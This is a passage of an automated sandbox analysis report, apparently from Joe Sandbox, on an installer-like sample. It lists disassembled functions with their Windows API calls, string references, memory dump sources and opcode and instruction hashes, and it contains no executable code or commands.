                                                                                                            • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                            • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,771B3420,004036EF), ref: 00405F46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: nsa
                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                            • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                            • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 004059E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                            • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                            • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                            • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                            • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                            • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                            • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                            • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                            • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2538278486.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_150000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \;q$\;q$\;q$\;q
                                                                                                            • API String ID: 0-2933265366
                                                                                                            • Opcode ID: e8a58ad1ad472d8edfb3c292d92e17a4feaf3d1132b81388bc5f95a743eea79d
                                                                                                            • Instruction ID: 77c5235b2c8dcc5d2c2c86d774070737446361be708ff2232c62d94ac68f6048
                                                                                                            • Opcode Fuzzy Hash: e8a58ad1ad472d8edfb3c292d92e17a4feaf3d1132b81388bc5f95a743eea79d
                                                                                                            • Instruction Fuzzy Hash: 41018431700915CFCB249E2DC460A2573E7AF8877A72A416AE827CF370DB35EC458791
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.2539011013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.2538972176.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539052327.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539096411.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                            • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98